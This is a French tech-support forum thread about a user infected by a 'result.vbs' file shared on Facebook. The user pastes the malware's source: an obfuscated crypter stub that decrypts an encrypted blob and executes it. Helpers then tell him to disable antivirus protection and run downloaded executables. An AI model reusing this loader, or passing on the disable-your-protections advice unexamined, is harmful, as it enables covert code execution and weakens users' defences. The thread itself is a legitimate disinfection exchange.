Posez votre question Signaler

Fichier vbs [Résolu/Fermé]

wessim - Dernière réponse le 7 juil. 2013 à 17:05
bonsoir tous,
deux jours plus tt j'ai tlcharger un fichier intitul result.vbs post dans un groupe sur facebook et suppos contenir le rsultat d'un concours auquel j'ai particip , aprs tlchargement j'ai vu qu'il n'y avait rien dedans, certains m'ont dis que c'est un virus ou un fichier espion ( je ne sais pas comment a s'appelle ) avec lequel le hackeur pourra me pirater tous mes comptes facebook,msn,skype.... et utiliser mon ordinateur comme il voudra , je n'ai rien vu depuis sauf le voyant de ma webcam intgre qui s'allume et s'teint tout seul en plus du fichier result.vbs qui s'excute tout seul chaque dmarrage malgr que je l'ai supprim , que faire ? merci de me rpondre
Lire la suite 
Réponse
+1
moins plus
salut repere le fichier , clic droit dessus , => modifier

le fichier va s'ouvrir , colle son contenu dans ta reponse

il doit tre dans

C:\users\<ta session>\AppData\roaming\Microsoft\windows\start menu\programs\startup\le fichier.vbs

si tu ne trouves pas AppData :

touche windows + R puis tape "%AppData%" , le dossier s ouvrira

Windows 8 => meme flop que Vista X 10

Réponse
+0
moins plus
bonjour merci pour votre rponse , j'ai trouv le fichier et je l'ai ouvert avec bloc note et voici ce qui est crit :
'< -Safa7_22 Crypter- >
cyber = Decrypting("-ۻ>YL"ض(TM) ̽c'- -ۻ>YL"ضz>ڻ0 -۾- 'CsҶŭlŻ--Ϸcڲԧ''Bҷξ߹м-Dռ>ŭlݭ-ηԼ--ŽoeJz'Nھҷoe' I" Ҷͽ9Żïκϭb--Ǿۯ>`o -ۻ>YL"ɯȮ'Zͧ -ۻ>YL"ضz>ڻ0 -۾-a"(TM)Ȯo˨÷~bڿҶ(TM)~Nż--'Ž-Z ʪ(TM)NҮ>̭bԪǾ>l׾'oezͽa"(TM)>ͭVɼ'----Pʮpн--ַ'dǾ(TM)lȫ Ž-IϲȺϮR-زža"ɮЬY'Nݾ--YdȿYȾ߷hƫ--ҳж>DӲѤ>ڻ0 -ѳӱ-IЯ>ڻ0 -۾- >P" z߶>p'--ӱZ sήQ-'è--ӱZ"sս--ΩA '~LҲۿ~xϾᷮ(TM)cҶ*ɪۯ'wͨ'--ĽZݯz(TM)ͭxڽĽ Z(TM)-ǿoeRȬᶭc--Ȯǿ''Y˭вϭb-->(TM)RƻY>~Zˮʯ̽5ȫвdЯǾ ϭFƫԧ 'Z(TM)ܲsέFپ~ Z(TM)"sǾ gͮç'Jͥ;չͭl"ξл`I"(TM)ͻA*޷-ŭIsչүpŻ- --үa"ɮ'俾>'lپzξ'>ds̽5ҭ-ηԯӽbԹүo -ۻ>YL"˿(TM)ϭFȧ -ۻ>YL"ضz>ڻ0 -۾-~YZsϽ1Э>ӳ>Dռ> ŷ0-вϮ--Z"չ-Ľxרյٰ(TM)bҲЯzү''J--''>c ʪگ෾Jнoe''CѲͭl"~ Zɮʮ߶0-'--'c-˿(TM)Y֯ݶ0-ȾžZ*ʮԪ'A˭ð͹YIڳ'A˭η>Ž--dɮ'俾>'N-ηټŭ-ZЯү'BѬ۷-~oeIܱz'A-> >Ź b z'A---YŽY-˶žN(TM)--Y cʮYʮͭU˯zͭa˰аչ-ĽxѬȾڸZѪ(TM)۪'A˭ؼӹLǿׯFبη'bѺԼײԹ(TM)NШη'aȮ Ͻ4˭zήZЯЬ'Y˽-๯--IsȮ̾Iˮͨ'--ĽbѪدg޲ѵԧ'I޿sɯξVȧ'~IҺǾʮͩIͧη'a(TM)ʮ'Ȩ>~F޾ ũ''Cͥ˯үFح- --'K"үŭ9--·ζcѪرz 'NƫҬ-(TM)c-ǿ>չŽVۭ'¼ޯ'CԿ>o'~Ԩ~c--Ȯ幩Ԥ'VYෳ(TM)Z>̽0˾>ͽ'C"(TM)ȮoѼȲžI--ž--Jи'b-"(TM)'̽N--'ٸ~Z --~ʿŽ5"Ѽ d(TM)ǯЯدͭl"'--ĽbѪԲ'ֶAԨϲͭa(TM)ϭU˭γͿQʺ'׵x--- żasս~lپYsoeϾZ(TM)"(TM)xȻ>ʷԧ'b"չ-ĽxѬȾз'KԪǾ(TM)lȫ طӽb"Ȯ(TM)RҸ~Ѯ'c--Ȯ࿾oe'x"ҼӲ̽c--ʮ(TM)׷Rƫ--ͭd--ʪ (TM)JǬӱZʯoe>p--η~ZǾYl׾'oezͽa(TM) 'lѭ(TM)Ź c--п >ϮJ*--ϲܯZͥJо'''`Iʮ>̽Y˭ӷӽaʯͻAܭsϬIsү~g˾Ⱦϭasʮ~JհҲͭcͥӯǿҷBȫθԧé'LѾȮ媸'A˭ηϭcҮа--ͽUѼ>Ҭ-'I˯Ǿ'l--෮̽L(TM)ȾޯY϶B"ūܲ'I˯ү̽Y˭'cʪǾҷ5ƻڷ'dʾֱͭl"вӱZ˯ТԱֶAoe'ͧв>'ϭ-a٪ү'A˭η'IȮ࿿-lȼ ''Cͥ˯ү'A˭η̽Iοׯ̽xа>»'`IοׯN"جŹdz'A˭η'I˯Ž5ƻξέdǾײ ͽU׭sй-'I˯ү'A˭ηZ(TM)sȾ5ϾҲ̽I ľRӭη'ZȾոkˮͧк'K"ү'A˭η'bЪү'A˭η'I˯Ǿ(TM)lȫ طӽb"ȮͶRżӺ٨ϭJͥ;ҰЭ̽xа>»ׯI˯ү'A˭ηũZ"ү'A˭ηũZ"ү'A˾>ҷԯI˯˯'Vپ-Ž IѪԼ̽Y>ӳY--ɯɿϧ0>ҷ'~>DʾʮB--'--ͽL'߱>p--'---έY">ʯo--ԧέdׯ>ʯoe8ͭϲYϩIsЯدQˮͯݷԧ'Z'(TM)'h"Ȭ~-cѺʾʮĽRͧoeZ-ʫԲ9ƻ--Yܯd(TM)ܲչQǫ-ԭc--˶ʯ~JհҰzԹd~ʨz 'Z*'--Yܯ'CѾ*Լ>Ǿ'lپY¬--̽DаյBݾ'~»sd"ǾүA зŽY'Cͥ˯ͻB-ҷ(TM)aЯЬ'BѿξI(TM)Ȯoپ>Ž ~aYսϮJṮ~c"࿾oeҵIԭz̾cͥЯүY'ؿ'c-Ȯžh۽>>(TM)̾b*ʯdޯ bЯҰЭέxȫ಼յϬIԤϩA ҲYd(TM)ȾϮMs-Ѳ~Y(TM)ͪ1Ƽ'ӱ-Z"̾ྯ(TM)Rǽ-կж>I˯ʪA zžY--* ~V׾'--Եb--ǾӤέVݽо-Z"ͱz'Zͨ''a(TM)Э0η'Zͥ Ь'9Ż>>ľ-a ٯs̾Rͧβ'Iʪ(TM)Iͧηž-D˯Ǿ '0Ż>Է'ӵYݭ˰аɮϭVݨη̽ I"Ǿد~Vȼҳεϭcʮ䪸'AŻ>Է-̽ IʿsŽFŻ>ղ'a(TM)s߿~4'ؿ'>Zz'lپY¬--̽I"ǾتQŻؼũd(TM)ʮ>o'~Ԩ~ή-Y"۪BҰԨž--b˺Yʨ>pūвY Z-->ϾtY X*(TM)ϮdѼӤb-"Խ(TM)Nǽ--ؼϮcҲ(TM)éIˮͨѲϩa(TM)ʮ'Ȯ ͽU׭sй޶I--(TM)ǿ-V~ݺ>'ϬIڳ'YŻ>Ҳͭcͥѯsͭxٽ--ӷ~d'ҲV*'ȷ-~bڿ(TM)JȫηγT Ѻl --~ZǾsR-ȲYs--d>~l>'ϬIȮ>N"جŹLͭԱ۲'d޽--ѳžIoeڷЯԯ'Nֻ'a(TM)ʮ'ȮAѭzͭY*Яҿ(TM)g޲κX*ůzžN(TM)--Y b--(TM)(TM)~Nż--'d*Ȯ࿾oeҷl--в̾'Jͦռ>Fؾ--ټӯasʮ~Jհ'ѳ̽I޿sɯ~Nż--ټͭ bsս--ΩAѭzͭY*Я>үoѼȮϽ''C"ʾ ϭlͨ үbͦոЭžN*ƻؼ>ϧ>DԤϩA ҲYd(TM)ȾϮMs-Ѳ~Y(TM)ͪ1Ƽ'ӱ-Z"̾ྯ(TM)Rǽ-կж>c-"(TM)'0YҮ>ЭcұŽxн--ιԨӤIѻ(TM)~lν''CѾа׿'R-sŭa--ЯүA˾>(TM)~--bۿϽ1;ξs''dz'A˭ '>Z (TM)--ͽV޾ϽoeZЯү'A˾Ү(TM)''Cͥ˯Լ̽Y>ӳZʾʮ0յ~ӹ-a ٯ׿s̾R(TM)- sžb--ʾoe'5ɬ-~dʯҶ'0÷~d-*(TM)ŹA ҲYd(TM)ȾϮMs-Ѳ~Y(TM)ͪ1Ƽ'ӱ-Z"̾ྯ(TM)Rǽ-կж>c-"Ȯ-Ž1ޭ- ~oec- ЭVǼ'Թbʪܯ~0-ܻ(TM)cѪ"ǾsϭVحڼׯb--'Ǫpȫ۷'b"Y媸ڰV-'--ϬYIȮ>pȫۺԹb-~ׯТԱ>V~ȥ-ؼ~bҲ"Яͭl" ϭc(TM)-Ǿ۷I٭ѵYc-ЯN->ҳζI˯ТԪ(TM)I˭ξ'IsV-'--'Cs ̽9٭-z'(TM)ža ٯүN->ҳζD>(TM)Z' sλdѪׯsN-sײϬb---Ǿ'4˲ͨ--ϲ'I"˯ռ׿s̾R(TM)-Ҳ'ZY'J޾'~--нbҶз>~V"Y'(TM)a(TM)(TM)ʮ'0˾--- Ž-K--Ǿ(TM)oe-pǼ ̭d(TM)>'͵B޽ѵ'ϩb-ϾM'Ž--c"˾ս5ɫüIҲȮʪ'Z-->--̾cҺɯϩI׭Юڸ'C"ԧ䯮~g->--̾cҺޯ௮ͭFȫ(TM)ð~>I˯׿s̾R(TM) '(TM)a(TM)دFȫ(TM)ð~ aȮ' ԱŹAѭκԯ eد(TM)Vżoe ''I(TM)ϾJȬη-' b*зũBȻ>Ҳ>DӲoeԹ-̽9٭zӹDаյBݾ'~»sd"oe(TM)ήJнλaȮ Ždݾҷо߬W --'N>Ƴ'Խ(TM)YоҰЭέxȧ>ϭb(TM)ȾޯY϶gۯԷ''CѯչV̾ ''IЬ'lѭ'bϱsήQ-'è--b(TM)Ⱦ޳'0˭ʷԧ'Y-չ-ĽxѬȾϭb"үϾN--¬̽ I"˯ʾϯo˭η̭b У(TM)l"ڭ¼T"5'ٸsľX˰аɮϩAŻ>Ҳͭ bׯТԱݶAˮͧƮ'--c-ɯ׿c׭--D˯ȯүo˭η~~cпͻA;Ѭ ЯI˯Ǯͭ9>s-Z͹ⱽ-NY' XzéIˮͨѲϩa(TM)ʮ'Ȯ ͽU׭sй޶Jͥ;ޯ--~JǬ¸Iѻ~ϯoͧηũZ"֯ӯoҼzԼ'CҲʪsήRȻجžb--"zүͭVɼ'----Z-"(TM)NҮ>(TM)cʾԱŹk'ҮԹ-YȮ ͽVūYҮ 'asʮ~JհҲͭKsȮ̾Iˮͨ'--ĽbѪٹ'B׽-Ⱦ~a"Ȯ ͽVūYҮ>̭dʮۯ`'xν'ӷԹ-YȮ ͽVūYҮ>̭dʮۯŽ4˨η~bڿ'J---'è--sZڲ--үЬ'NἮεϭbҲ"'YŻ>Ҳͭ b˰аǯ'ոQԨη(TM)cʪʾ-'0>ҷԯcҭٿ(TM)׿''NȧؼӹI">(TM)RƻY>έd~ʮȮͶl--в̾'Jͦռ>Fؾڽӱc-ԪЬžJݰ>~°Ϭ`IʮЭ(TM)~Nż--٬~̾'CѺʾ ϭl-յ--bѲ"Ǿ௮~5-ҷ̽dױz'N"'ؼ--߬YIsȮ̾Iˮͨ·ζb*ޯ(TM)RѼ(TM)̽dײίͶAܯ- --'a"ʯsͭ9̾ 'Ž-Z ʪ;N~ƻͭ-dͱz(TM)̮R"ǫ >~L үխ(TM)QͰҳ޺ϣIͥѯs͵AͳͯθԨ(TM)-IͲҰЬ̾M-Ȳ'Jͦɮʮ'Y˾üͩZѪ(TM)ùԤh"ȬzͭZ(TM)֯'ϯo˭η-~-I (TM)~5-ҷ-(TM)Y(TM)-'g-'è--̽ LѾȮ˿-Ž1ڽzж>a˯~R-> ҷbˮʯͶN"'ؼ--dz'9 ~ b-ϲȮ-ŽZƫι'--ԹdѺ"ٹũBԾ-¿'a"ʯsͭ9̾>Ҳ--ϾPݳʮ0η͹b-sŭ9--·Z˯չ-Vƻ >~I"˿s׿~Jվ'--ŭY(TM)ʯ׿>϶0ηϭb-sŭ9--·ίڰCʯY'E˨ձ(TM)b"Ҳ̾RЭY--Ϯb--Ȯ žN->°Ů'CϮ忿ϭ9Żӷ'--ԹdѺ"zͷN--'ӲձŽ IʮչЬ'B޾ (TM)ZzĽQ˭-Y--̭Z"֯ӯpԾͧ ԹZ --῾l׾>--߬c--(TM)' ܶB"ūܱή>I˯~JհҰ~ԨϮYʮũBԾͧؼũd(TM)ʮ>","dddfgnkfgkfkf" ,1)
Safa7_22 = deCrypt(cyber)
EXECUTE (Safa7_22)
function deCrypt(data)
deCrypt=decodeBase64(data)
end function
Function decodeBase64(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin

base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, " ", "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, "Base64Decode", "Bad Base64 string."
Exit Function
End If
For groupBegin = 1 To dataLength Step 4
Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
numDataBytes = 3
nGroup = 0

For CharCounter = 0 To 3
thisChar = Mid(base64String, groupBegin + CharCounter, 1)

If thisChar = "=" Then
numDataBytes = numDataBytes - 1
thisData = 0
Else
thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
End If

If thisData = -1 Then
Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
Exit Function
End If

nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), "0") & nGroup
pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
Chr(CByte("&H" & Mid(nGroup, 5, 2)))
sOut = sOut & Left(pOut, numDataBytes)
Next
decodeBase64 = sOut
End Function
Function String2Asc( strIn)
arrResult = Array()
ReDim arrResult( CInt( Len( strIn ) ) )
For intI = 0 to Len(strIn) - 1
arrResult( intI ) = Asc( Mid( strIn,intI + 1 ,1 ) )
Next
String2Asc = arrResult
End Function

Function Decrypting( strDecrypt, strKey, intSeed)
Rnd(-1)
Randomize intSeed
intRnd = Int( ( Len(strKey) - 1 + 1 ) * Rnd + 1 )

arrDecrypt = String2Asc(strDecrypt)
arrKey = String2Asc(strKey)

For intI = 0 to UBound( arrDecrypt ) - 1

intPointer = intI + intRnd
If intPointer > UBound(arrKey) Then
intPointer = intPointer - ((UBound(arrKey) + 1 ) * Int(intPointer / (UBound(arrKey) + 1)))
End If

intCalc = arrDecrypt(intI) - arrKey(intPointer)

If intCalc < 0 Then
intCalc = intCalc + 256
End If
strDecrypted = strDecrypted & Chr(intCalc)
Next
Decrypting = strDecrypted
End Function

Réponse
+0
moins plus
▶ Tlchargez UsbFix (cr par El Desaparecido) sur votre Bureau.

▶ Si votre antivirus affiche une alerte, ignorez-la et dsactivez l'antivirus temporairement.
Branchez toutes vos sources de donnes externes votre PC (cl USB, disque dur externe, etc...) sans les ouvrir.
▶ Double cliquez sur UsbFix.exe. (pour les utilisateurs de windows Vista , windows 7 , windows 8 , clique droit => executer en tant qu'administrateur"

▶ Cliquez sur [Suppression].
▶ Laissez travailler l'outil.

▶ la fin du scan, un rapport va s'afficher, postez-le dans votre prochaine rponse sur le forum.

▶ Le rapport est aussi sauvegard la racine du disque systme ( C:\UsbFix.txt ).


Réponse
+0
moins plus
il marche pas chaque fois un fichier AV.vbs s'ouvre et la suppression s'arrte 10%

Réponse
+0
moins plus
Attention !!! : Seuls ces liens sont officiels ne pas telecharger l'outil sur d'autres liens !!
Attention !!! : cet outil peut etre dtect tort comme virus
Attention !!! : cet outil est puissant suivre scrupuleusement les instructions ci-dessous

tous les processus "non vitaux de windows" vont tre coups , enregistre ton travail. Il y aura une extinction du bureau pendant le scan --> pas de panique.

Dsactive toutes tes protections si possible , antivirus , sandbox , pare-feux , etc....: http://forum.pcastuces.com/desactiver_les_protections_residentes-f31s4.htm

telecharge et enregistre Pre_Scan sur ton bureau :

http://services.service-webmaster.fr/cpt-clics/clics-30453-6820.html (renomm winlogon)

ou , si le lien n'est pas fonctionnel :

http://www.archive-host.com/files/1731274/ecd939269bcc7cdfed2d2e726c22709a32db3067/winlogon.exe (renomm winlogon)
http://www.security-helpzone.com/Tools/g3n/winlogon.exe (renomm winlogon)

si l'outil est relanc plusieurs fois , il te proposera un menu et qu'aucune option n'est demande, lance l'option "Scan|Kill"

si l'outil est bloqu par l'infection utilise cette version avec ces autres extensions :

http://www.security-helpzone.com/Tools/g3n/Pre_Scan.scr
http://www.security-helpzone.com/Tools/g3n/Pre_Scan.pif
http://www.security-helpzone.com/Tools/g3n/Pre_Scan.com

si l'outil detecte un proxy et que tu n'en as pas install clique sur "supprimer le proxy"

Il se peut que des fentres noires clignotent , laisse-le travailler.

l'outil va envoyer sur un serveur les virus qu'il a mis en quarantaine afin que je puisse l'ameliorer et etudier ces infections plus en profondeur.

Laisse l'outil redemarrer ton pc.

Poste Pre_Scan_la_date_et_l'heure.txt qui apparaitra la racine de ton disque systme ( gnralement C:\ )

NE LE POSTE PAS SUR LE FORUM !!! (il est trop long)

Heberge le rapport sur http://cjoint.com puis donne le lien obtenu en echange sur le forum o tu te fais aider


Réponse
+0
moins plus
usb fix je l'ai tlcharg du lien que vous m'avez donn, je fais quoi maintenant j'abandonne usbfix et je tlcharge les nouveaux ou quoi ?

Réponse
+0
moins plus
fais ce qui est marqu au dessus

Réponse
+0
moins plus
le logo du logiciel c'est la photo de profil de celui qui m'a envoy le fichier comment pourrais-je etre certain que ce n'est pas du hack comme l'indique votre nom ?

Réponse
+0
moins plus
bof.....si tu veux tape mon peudo sur google ou le nom de l'outil....
si c'tait un outil de hack , tu crois vraiment qu'il serait en telechargement sur commentcamarche ?

Réponse
+0
moins plus
dsol je suis nouveau ici je n'ai aucune ide sur le forum ni sur ses modrateurs , donc excusez-moi je suis un peu trop prudent cause de ce maudit fichier , je vais faire le scan maintenant

g3n-h@ckm@n 13830Messages postés jeudi 31 janvier 2013Date d'inscription 14 novembre 2014 Dernière intervention - 7 juil. 2013 à 16:15
et tu as bien raison
Réponse
+0
moins plus
chaque fois que je clique sur scan|kill un cran bleu s'affiche el le pc redmarre

Réponse
+1
moins plus
bonjour,

je te conseille de suivre une seule dsinfection :

http://www.commentcamarche.net/forum/affich-28198124-fichier-vbs-non-supprimable

toi de voir sur quel poster continuer !



wessim- 7 juil. 2013 à 16:56
ok merci ,vu que cette dsinfection n'a pas l'air de bien fonctionner je vais suivre l'autre, merci g3n
Réponse
+0
moins plus
la demande de l'internaute, on ferme celui ci :

http://www.commentcamarche.net/forum/affich-28198124-fichier-vbs-non-supprimable#11



wessim- 7 juil. 2013 à 17:00
non fermez celui l http://www.commentcamarche.net/forum/affich-28195943-fichier-vbs#p28198808 !!!
Electricien 69 52540Messages postés dimanche 12 avril 2009Date d'inscription Contributeur sécuritéStatut 2 juillet 2015 Dernière intervention - 7 juil. 2013 à 17:01
tu as mobilis 2 personnes inutilement !

attends voir le quel va tre fermer,

la dcision appartient la modration :D
wessim- 7 juil. 2013 à 17:04
je suis dsol..
Electricien 69 52540Messages postés dimanche 12 avril 2009Date d'inscription Contributeur sécuritéStatut 2 juillet 2015 Dernière intervention - 7 juil. 2013 à 17:05
pas grave, mais regarde ce que Malekal t'a post, il a fini avec ton pc ;D
Ce document intitulé «  fichier vbs  » issu de CommentCaMarche (www.commentcamarche.net) est mis à disposition sous les termes de la licence Creative Commons. Vous pouvez copier, modifier des copies de cette page, dans les conditions fixées par la licence, tant que cette note apparaît clairement.

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes.

Le fait d'être membre vous permet d'avoir des options supplémentaires.